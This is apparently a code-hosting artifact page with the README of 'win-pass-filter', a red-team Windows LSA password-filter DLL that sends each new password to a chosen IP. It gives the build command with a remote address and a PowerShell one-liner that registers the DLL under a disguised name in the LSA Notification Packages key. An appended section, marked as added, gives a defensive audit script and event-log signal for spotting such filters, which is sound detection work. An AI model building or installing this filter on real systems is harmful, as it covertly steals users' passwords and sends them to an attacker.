Windows Password Filter


Artifact Content

Artifact 852c2c475e9acbb034513e41e6f0bf0f0a9afcdf10fc5af559c7646a12e5a83d:

  • File README.md — part of check-in [f2dea56b19] at 2019-06-07 00:51:53 on branch trunk — Initial Commit (user: brimstone size: 918)

win-pass-filter
===============

_stolen from https://github.com/iDigitalFlame/redteam-tools_

This is a Windows LSA password filter that sends the new password to an IP of
your choosing.

Build
-----

Simply build for Windows with CGO enabled and the appropriate receiver listening
port:
```
GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags 'main.remote=192.168.0.100:4444'
```


Install
-------

Copy the `filter.dll` to somewhere like `c:\windows\system32\idk.dll` and
install with PowerShell:
```
powershell -com "$a='idk';$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`n$a"""
```

If you change the name of the DLL in `c:\windows\system32` then also update the
`$a` variable.

Reboot when finished.
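
The install step above leaves a visible trace: an extra name in the `Notification Packages` value under the `Lsa` key, backed by a DLL in `System32`. The following audit script is an added example, not part of the original README or the upstream project; the `$Baseline` list and the function name `Get-LsaNotificationPackageAudit` are assumptions to adapt to your environment.

```powershell
# Added example (not from the original README): audit registered LSA password filters.
# Assumption: $Baseline holds the package names expected in your environment.
# Run from a 64-bit session so System32 is not redirected to SysWOW64.
$Baseline = @('scecli', 'rassfm')
$LsaKey   = 'HKLM:\System\CurrentControlSet\Control\Lsa'

function Get-LsaNotificationPackageAudit {
    param(
        [string[]]$Packages,
        [string[]]$Allowed = $Baseline,
        [string]$SystemDir = (Join-Path $env:SystemRoot 'System32')
    )
    # One REG_MULTI_SZ element can hold several names if it was written by
    # string concatenation, so split on whitespace and check each name.
    $names = $Packages | ForEach-Object { $_ -split '\s+' } | Where-Object { $_ }
    foreach ($name in $names) {
        $file   = if ($name -match '\.dll$') { $name } else { "$name.dll" }
        $path   = Join-Path $SystemDir $file
        $exists = Test-Path -LiteralPath $path
        $sig    = if ($exists) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        [pscustomobject]@{
            Package   = $name
            Expected  = $Allowed -contains $name
            Exists    = $exists
            Signature = if ($sig) { $sig.Status } else { 'n/a' }
            Signer    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            Modified  = if ($exists) { (Get-Item -LiteralPath $path).LastWriteTimeUtc } else { $null }
            Path      = $path
        }
    }
}

$value = (Get-ItemProperty -Path $LsaKey -Name 'Notification Packages').'Notification Packages'
$audit = Get-LsaNotificationPackageAudit -Packages $value
$audit | Sort-Object Expected | Format-Table -AutoSize

# Anything outside the baseline, unsigned, or missing on disk deserves a closer look.
$audit | Where-Object { -not $_.Expected -or $_.Signature -ne 'Valid' } |
    ForEach-Object { Write-Warning "Review LSA notification package: $($_.Package) ($($_.Path))" }
```

With the "Audit Security System Extension" policy enabled, Windows also records Security event 4614 each time a notification package is loaded, which gives a log-based signal alongside this registry check.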